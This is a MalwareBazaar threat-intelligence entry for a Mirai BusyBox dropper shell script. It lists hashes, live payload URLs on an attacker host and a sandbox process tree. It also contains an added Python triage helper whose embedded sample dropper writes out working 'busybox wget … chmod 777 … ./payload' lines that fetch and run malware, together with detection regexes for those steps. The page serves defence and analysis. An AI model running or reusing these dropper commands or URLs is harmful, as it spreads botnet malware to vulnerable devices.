MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 cb894059764a25d53785b0745191805a775872b11ce1a5ee24b9d5688c26a969. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Signature: Mirai
Vendor detections: 7

SHA256 hash: cb894059764a25d53785b0745191805a775872b11ce1a5ee24b9d5688c26a969
SHA3-384 hash: d15fe1a5dba8796c9ac3b8c83d9c313a0c7e9f852e3639ea8e07984b0ad54e4862c4679cae721e57e7530ceb1b29288d
SHA1 hash: c49fe9f4ea1ba7d1c3737484c262618d7d662c42
MD5 hash: 67051d4de174c6d5df4d17d0517c2df6
humanhash: nebraska-juliet-harry-florida
File name: busybox.sh
Download: download sample
Signature: Mirai
File size: 1'078 bytes
First seen: 2025-06-30 16:59:35 UTC
Last seen: Never
File type: sh
MIME type: text/plain
ssdeep: 24:9IjdISdIRGNIN/dInKndIRdIEdIGQdI3ZdIaldIXdI61U:GjmSm/mnsmRmEmGQm3ZmalmXm61U
TLSH: T1E21160EB005EB4408C2D9D61B0396C59B5848BF03594DB89F48ED4B6F2A9E3B6336F49
Magika: txt
Reporter: abuse_ch
Tags: sh
Payloads fetched by this dropper (one row per URL; columns: URL | Malware sample (SHA256 hash) | Signature | Tags):

http://bulon.trumdvfb.com/skibidi/cutearm | 1bc137841445a32184b981463f26cf92cd5faee96c6530b71788322f6e02b74c | Mirai | elf mirai opendir ua-wget
http://bulon.trumdvfb.com/skibidi/cutearm5 | 31bd74459680c387a1eb10667a44b7691101778b2eee79dd9e33c27cf18af7eb | Mirai | elf mirai opendir ua-wget
http://bulon.trumdvfb.com/skibidi/cutearm6 | e7ed00ebd7a3124bf74c3a1e5de27d55daeba1a6c6dd9b507a5c4435eb87e78c | Mirai | elf mirai opendir ua-wget
http://bulon.trumdvfb.com/skibidi/cutearm7 | b2510b90cc924b8bde71cb86f3875a466de3a4dff19efa2cc4d93173f38a3381 | Mirai | elf mirai opendir ua-wget
http://bulon.trumdvfb.com/skibidi/cutem68k | fc1848906eb6cf539a5009dfa5cbd87b822287242ceb9e04e7bd6f747a1f0a6e | Mirai | elf mirai opendir ua-wget
http://bulon.trumdvfb.com/skibidi/cutemips | 994d3872166fd7b39d2c05628c86417140f456637e811f9235792c5b667947dd | Mirai | elf mirai opendir ua-wget
http://bulon.trumdvfb.com/skibidi/cutempsl | e389a22f9b3afb0c931166ee35ed4668519b21fb82040c5def34e6da01918b43 | Mirai | elf mirai opendir ua-wget
http://bulon.trumdvfb.com/skibidi/cutepowerpc | n/a | n/a | elf opendir ua-wget
http://bulon.trumdvfb.com/skibidi/cutesh4 | 245daaf02866c349c32028beeaec0c428a85ad4a0fe3df40449ad0cdd2942db6 | Mirai | elf mirai opendir ua-wget
http://bulon.trumdvfb.com/skibidi/cutex86 | 72f6704fdb711d1ba20c96a7ef73e7ac2cd41943cc4bdd417cab03417be1eb55 | Mirai | elf mirai opendir ua-wget
http://bulon.trumdvfb.com/skibidi/cutex86_64 | a6880d908d5fa479ce234db7beed1598d5c8e9304696d3af7dc8cfee07a55e7e | Mirai | elf mirai opendir ua-wget

Intelligence


File Origin
# of uploads: 1
# of downloads: 84
Origin country: DE

Vendor Threat Intelligence
Status: terminated
Behavior Graph (rendered process and network graph, reduced here to the facts it records):
/usr/bin/sudo (pid 3146)
  execve -> /tmp/sample.bin (pid 3151), the dropper script
    rounds 1-9 (busybox pids 3152 through 4113), one per payload in IOC-table order, each: execve /usr/bin/busybox (dns, net, send-data, write-file), execve /usr/bin/chmod, clone /usr/bin/dash; every busybox sends 72 B to 10.0.2.3:53 (DNS) and 96 to 100 B to bulon.trumdvfb.com:80 (the HTTP fetch); round 8 (100 B request, the length of the powerpc name) records no write-file, consistent with the n/a row in the IOC table
    round 10: execve /usr/bin/busybox (pid 4275; dns, net, send-data, write-file), execve /usr/bin/chmod (pid 4430), then execve -> /home/sandbox/cutex86 (pid 4431; delete-file, net), the x86 payload, the only one recorded as executing
      clone -> pid 4434 (dns, net, send-data, zombie): 36 B to 8.8.8.8:53, 14 B to bulon.trumdvfb.com:47925; clone -> pid 4437
    round 11: execve /usr/bin/busybox (pid 4436; dns, net, send-data) sends its 72 B DNS query and connects to bulon.trumdvfb.com:80 with no send or write-file recorded, execve /usr/bin/chmod (pid 4443), clone /usr/bin/dash (pid 4446)
    execve -> /usr/bin/rm (pid 4449; delete-file), cleanup
Threat name: Document-HTML.Downloader.Heuristic
Status: Malicious
First seen: 2025-06-30 17:00:09 UTC
File Type: Text (Shell)
AV detection: 7 of 24 (29.17%)
Threat level: 2/5

Result
Malware family: n/a
Score: 3/10
Tags: n/a
Behaviour:
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
(The three behaviours above are Windows indicators; a registry and SetWindowsHookEx do not exist on the Linux devices this POSIX shell script runs on, so they describe the Windows sandbox that processed the text file, not the dropper. The Linux process tree in the Behavior Graph above is the relevant behavioural record.)
Please note that we are no longer able to provide a coverage score for VirusTotal.
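The Behavior Graph above records the dropper's loop (busybox wget, chmod, execution attempt, rm) and the IOC table lists the per-architecture payloads it fetches. The following is an added Python example, not code from MalwareBazaar, abuse.ch or the sample itself: it pulls download URLs and saved filenames out of a dropper script of this shape, reconciles them with the SHA256 values from the IOC table, checks a captured payload against its recorded hash, and reports which stages of the fetch/chmod/exec/cleanup loop the script contains. The DROPPER text is constructed to follow the recorded behaviour and is not the contents of busybox.sh; it covers five of the eleven architectures to keep the sample short, and the "cute<arch>" naming and the regexes are assumptions.

```python
"""Triage helper for a Mirai-style BusyBox dropper (added example).

Not code from MalwareBazaar, abuse.ch or the sample. DROPPER is
CONSTRUCTED to follow the pattern the sandbox recorded for busybox.sh
(busybox wget -> chmod -> exec -> rm per architecture); it is not the
file's contents, and the cute<arch> naming and regexes are assumptions.
"""
import hashlib
import re
from urllib.parse import urlsplit

# Constructed dropper text (five of the eleven architectures in the IOC table).
DROPPER = """#!/bin/sh
cd /tmp || cd /var/run || cd /dev/shm
busybox wget http://bulon.trumdvfb.com/skibidi/cutearm -O cutearm; chmod 777 cutearm; ./cutearm
busybox wget http://bulon.trumdvfb.com/skibidi/cutemips -O cutemips; chmod 777 cutemips; ./cutemips
busybox wget http://bulon.trumdvfb.com/skibidi/cutepowerpc -O cutepowerpc; chmod 777 cutepowerpc; ./cutepowerpc
busybox wget http://bulon.trumdvfb.com/skibidi/cutex86 -O cutex86; chmod 777 cutex86; ./cutex86
busybox wget http://bulon.trumdvfb.com/skibidi/cutex86_64 -O cutex86_64; chmod 777 cutex86_64; ./cutex86_64
rm -rf cute*
"""

# SHA256 values copied from the IOC table on this page; None where it says n/a.
IOC_TABLE = {
    "cutearm":     "1bc137841445a32184b981463f26cf92cd5faee96c6530b71788322f6e02b74c",
    "cutearm5":    "31bd74459680c387a1eb10667a44b7691101778b2eee79dd9e33c27cf18af7eb",
    "cutearm6":    "e7ed00ebd7a3124bf74c3a1e5de27d55daeba1a6c6dd9b507a5c4435eb87e78c",
    "cutearm7":    "b2510b90cc924b8bde71cb86f3875a466de3a4dff19efa2cc4d93173f38a3381",
    "cutem68k":    "fc1848906eb6cf539a5009dfa5cbd87b822287242ceb9e04e7bd6f747a1f0a6e",
    "cutemips":    "994d3872166fd7b39d2c05628c86417140f456637e811f9235792c5b667947dd",
    "cutempsl":    "e389a22f9b3afb0c931166ee35ed4668519b21fb82040c5def34e6da01918b43",
    "cutepowerpc": None,
    "cutesh4":     "245daaf02866c349c32028beeaec0c428a85ad4a0fe3df40449ad0cdd2942db6",
    "cutex86":     "72f6704fdb711d1ba20c96a7ef73e7ac2cd41943cc4bdd417cab03417be1eb55",
    "cutex86_64":  "a6880d908d5fa479ce234db7beed1598d5c8e9304696d3af7dc8cfee07a55e7e",
}

# A download command: optional busybox prefix, wget/curl, URL, optional -O target.
FETCH_RE = re.compile(
    r"(?:busybox\s+)?(?:wget|curl)\s+(?P<url>https?://[^\s;|&]+)"
    r"(?:\s+-[oO]\s+(?P<out>[^\s;|&]+))?"
)

# Stages of the drop loop; all four together is the classic dropper shape.
DROPPER_MARKERS = {
    "fetch":   re.compile(r"\b(?:busybox\s+)?(?:wget|curl|tftp)\b"),
    "chmod":   re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\b"),
    "exec":    re.compile(r"(?:^|[;\s])\./\S+"),
    "cleanup": re.compile(r"\brm\s+-r?f\b"),
}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def extract_fetches(script: str) -> list:
    """One record per download command: URL, host, saved name, implied arch."""
    records = []
    for m in FETCH_RE.finditer(script):
        url = m.group("url")
        parts = urlsplit(url)
        name = m.group("out") or parts.path.rsplit("/", 1)[-1]
        # Assumption: payloads are named cute<arch>; strip the prefix for the arch.
        arch = name[4:] if name.startswith("cute") else name
        records.append({"url": url, "host": parts.hostname, "name": name, "arch": arch})
    return records


def blocklist(script: str) -> set:
    """Hosts to block at DNS or egress: every host the script downloads from."""
    return {r["host"] for r in extract_fetches(script)}


def reconcile(script: str, table: dict) -> dict:
    """Saved name -> SHA256 from the IOC table, None when the table has none."""
    return {r["name"]: table.get(r["name"]) for r in extract_fetches(script)}


def verify_payload(name: str, data: bytes, table: dict) -> bool:
    """True only when the table has a hash for `name` and `data` hashes to it."""
    expected = table.get(name)
    return expected is not None and sha256_hex(data) == expected


def dropper_indicators(script: str) -> dict:
    """Which stages of the fetch/chmod/exec/cleanup loop the script contains."""
    return {k: bool(rx.search(script)) for k, rx in DROPPER_MARKERS.items()}


if __name__ == "__main__":
    print("indicators:", dropper_indicators(DROPPER))
    print("block hosts:", sorted(blocklist(DROPPER)))
    for name, digest in reconcile(DROPPER, IOC_TABLE).items():
        print(f"{name:12s} {digest or 'no hash on record'}")
```

Run against a real dropper, `reconcile` tells you which fetched payloads already have a hash on record and which (like the powerpc one here) you still need to capture, and `verify_payload` lets you confirm that a file pulled from the open directory is the same binary MalwareBazaar catalogued rather than a rotated build.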

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method | Signature | Malware sample (SHA256 hash)
Web download | Mirai | sh cb894059764a25d53785b0745191805a775872b11ce1a5ee24b9d5688c26a969 (this sample)

Delivery method: Distributed via web download

Comments